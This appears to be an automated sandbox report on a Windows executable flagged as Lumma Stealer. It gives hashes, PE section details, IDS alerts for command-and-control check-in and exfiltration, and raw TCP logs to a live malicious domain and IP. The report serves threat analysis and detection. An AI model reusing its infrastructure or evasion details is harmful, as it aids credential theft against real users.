                                                          https://property-imper.sbs/QjFfile.exe, 00000000.00000002.1602997053.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1601608545.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600993007.0000000000B3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1463051061.00000000053F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1377635826.000000000531E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377813138.000000000531C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1377884296.000000000531C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctafile.exe, 00000000.00000003.1493958701.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                104.21.33.116
                                                                		property-imper.sbsUnited States
                                                                		13335CLOUDFLARENETUSfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1561604
                                                                Start date and time:2024-11-23 21:58:12 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 36s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:7
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:file.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 2
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target file.exe, PID 7400 because there are no executed function
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: file.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                15:59:19API Interceptor8x Sleep call for process: file.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                104.21.33.116file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                          Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                            S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                              Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                Aura.exeGet hashmaliciousUnknownBrowse
                                                                                  injector V2.4.exeGet hashmaliciousLummaC StealerBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    property-imper.sbs2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                    • 104.21.33.116

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUS2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                    • 172.67.162.84
                                                                                    EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                                    • 162.159.129.233
                                                                                    ZOL2mIYAUH.exeGet hashmaliciousPhemedrone Stealer, PureLog Stealer, XWorm, zgRATBrowse
                                                                                    • 104.26.0.100
                                                                                    owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 172.67.75.40
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                                    • 172.66.0.158
                                                                                    kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                    • 104.20.22.46
                                                                                    https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                    • 172.64.41.3

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousCryptbotBrowse
                                                                                    • 104.21.33.116
                                                                                    2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    No created / dropped files found

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.948105984108532
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:file.exe
                                                                                    File size:1'851'904 bytes
                                                                                    MD5:9e7bc3b3dd97d4c8f7549b9c66b2314f
                                                                                    SHA1:516e616760a09479d2be4d2cc84da87d82d149b7
                                                                                    SHA256:ad78228ca872a46d56df0249f02c595ad33ddfd225e998bfe25fe358e3df1972
                                                                                    SHA512:d18e6a52b0388c386d795d6529769cbf5f91ce84b4f5e6c6cebf8392f94561b3b4cf9a281cefbc40dfcbe6877133ae14cc4fc14d74478ead7bd3c7eb4fba9e30
                                                                                    SSDEEP:49152:qDL39/vSdr7ca08ejMPgYnr6z2rLg2KmQUT:qQdEBt4Pva2HgQ
                                                                                    TLSH:E38533D88E13151FEBF2A93A60B34307597A5E672FC882548389ABF57D29098DF4DF01
                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................pI...........@...........................I......r....@.................................\...p..

                                                                                    File Icon

                                                                                    Icon Hash:00928e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x897000
                                                                                    Entrypoint Section:.taggant
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:0
                                                                                    File Version Major:6
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp 00007FE9F8EB84BAh

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    0x10000x560000x26200ab54a231acff732e82c86dee690d2110False0.9992763831967213data7.9816569167604365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x570000x2b00x2005a25c95978e969a12e7c25151de5f77eFalse0.79296875data6.032112796472903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    0x590000x2a20000x200f179396d94302780f3a47897f676cfa2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    rlmvjdwl0x2fb0000x19b0000x19a400e7b6ba40091e26e13c9d51b0963a4b73False0.9947327515615478data7.954044867111088IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    gbnwhjnd0x4960000x10000x400074743401ae7a374319744faf268eae4False0.7099609375data5.613816159123689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .taggant0x4970000x30000x2200267f8170c67c40d635c7896ad9c8672dFalse0.06789981617647059DOS executable (COM)0.8129320889133631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_MANIFEST0x4950c80x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                                    Imports

                                                                                    DLLImport
                                                                                    kernel32.dlllstrcpy

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-11-23T21:59:19.711680+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749702104.21.33.116443TCP
                                                                                    2024-11-23T21:59:20.413016+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749702104.21.33.116443TCP
                                                                                    2024-11-23T21:59:20.413016+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749702104.21.33.116443TCP
                                                                                    2024-11-23T21:59:21.806257+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703104.21.33.116443TCP
                                                                                    2024-11-23T21:59:23.600917+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749703104.21.33.116443TCP
                                                                                    2024-11-23T21:59:23.600917+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749703104.21.33.116443TCP
                                                                                    2024-11-23T21:59:25.281274+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749714104.21.33.116443TCP
                                                                                    2024-11-23T21:59:27.645282+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749720104.21.33.116443TCP
                                                                                    2024-11-23T21:59:32.222550+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749720104.21.33.116443TCP
                                                                                    2024-11-23T21:59:33.667605+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749736104.21.33.116443TCP
                                                                                    2024-11-23T21:59:37.476139+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749744104.21.33.116443TCP
                                                                                    2024-11-23T21:59:40.449425+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749756104.21.33.116443TCP
                                                                                    2024-11-23T21:59:46.111122+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749768104.21.33.116443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 23, 2024 21:59:18.394304037 CET49702443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:18.394335985 CET44349702104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:18.394413948 CET49702443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:18.397532940 CET49702443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:18.397547007 CET44349702104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:19.711496115 CET44349702104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:19.711679935 CET49702443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:19.714740038 CET49702443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:19.714745045 CET44349702104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:19.715061903 CET44349702104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:19.763653040 CET49702443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:19.763683081 CET49702443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:19.763767004 CET44349702104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:20.413026094 CET44349702104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:20.413150072 CET44349702104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:20.413237095 CET49702443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:20.415581942 CET49702443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:20.415596008 CET44349702104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:20.492486000 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:20.492528915 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:20.492604017 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:20.492937088 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:20.492954016 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:21.806128979 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:21.806257010 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:21.830982924 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:21.831002951 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:21.831381083 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:21.834156036 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:21.834218025 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:21.834271908 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.600956917 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.601047039 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.601097107 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.601111889 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.601176977 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.601218939 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.601227045 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.609313965 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.609364986 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.609375000 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.609384060 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.609431982 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.617486000 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.629434109 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.629479885 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.629491091 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.637842894 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.637907982 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.637917042 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.688657045 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.814068079 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.816647053 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.816713095 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.816725969 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.816747904 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.816798925 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.816898108 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.816912889 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.816930056 CET49703443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.816937923 CET44349703104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.927170038 CET49714443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.927196980 CET44349714104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:23.927290916 CET49714443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.927617073 CET49714443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:23.927629948 CET44349714104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:25.281197071 CET44349714104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:25.281274080 CET49714443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:25.282618046 CET49714443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:25.282624006 CET44349714104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:25.282957077 CET44349714104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:25.284159899 CET49714443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:25.284375906 CET49714443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:25.284411907 CET44349714104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:26.196579933 CET44349714104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:26.196782112 CET44349714104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:26.196813107 CET49714443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:26.196852922 CET49714443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:26.332216978 CET49720443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:26.332251072 CET44349720104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:26.332353115 CET49720443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:26.332674026 CET49720443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:26.332690001 CET44349720104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:27.645194054 CET44349720104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:27.645282030 CET49720443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:27.646717072 CET49720443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:27.646723032 CET44349720104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:27.646939993 CET44349720104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:27.648298979 CET49720443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:27.648478031 CET49720443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:27.648509979 CET44349720104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:27.648597002 CET49720443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:27.691378117 CET44349720104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:32.222537041 CET44349720104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:32.222609997 CET44349720104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:32.222683907 CET49720443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:32.222882986 CET49720443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:32.222897053 CET44349720104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:32.417097092 CET49736443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:32.417144060 CET44349736104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:32.417222023 CET49736443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:32.417818069 CET49736443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:32.417835951 CET44349736104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:33.667534113 CET44349736104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:33.667604923 CET49736443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:33.669236898 CET49736443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:33.669249058 CET44349736104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:33.669461966 CET44349736104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:33.670877934 CET49736443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:33.671009064 CET49736443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:33.671032906 CET44349736104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:33.671088934 CET49736443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:33.671097994 CET44349736104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:35.460016012 CET44349736104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:35.460103035 CET44349736104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:35.460155010 CET49736443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:35.460316896 CET49736443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:35.460333109 CET44349736104.21.33.116192.168.2.7
